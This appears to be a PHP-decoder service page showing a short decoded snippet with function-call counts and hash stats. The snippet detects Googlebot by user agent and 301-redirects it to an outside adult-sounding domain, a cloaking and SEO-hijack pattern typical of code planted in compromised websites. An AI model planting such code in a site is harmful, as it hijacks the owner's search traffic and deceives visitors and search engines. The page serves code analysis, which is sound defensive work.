Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
$botAgents = "/Googlebot/i"; $agent = $_SERVER['HTTP_USER_AGENT']; if (preg_match($bo..
Decoded Output download
<? $botAgents = "/Googlebot/i";
$agent = $_SERVER['HTTP_USER_AGENT'];
if (preg_match($botAgents,$agent)) {
header("HTTP/1.1 301 Moved Permanently");
header("Location: http://www.sexyapes.com");
} ?>
Did this file decode correctly?
Original Code
$botAgents = "/Googlebot/i";
$agent = $_SERVER['HTTP_USER_AGENT'];
if (preg_match($botAgents,$agent)) {
header("HTTP/1.1 301 Moved Permanently");
header("Location: http://www.sexyapes.com");
}
Function Calls
| header | 1 |
| preg_match | 1 |
Stats
| MD5 | 4801ddf3989d3b54dc144967ec8652cd |
| Eval Count | 0 |
| Decode Time | 115 ms |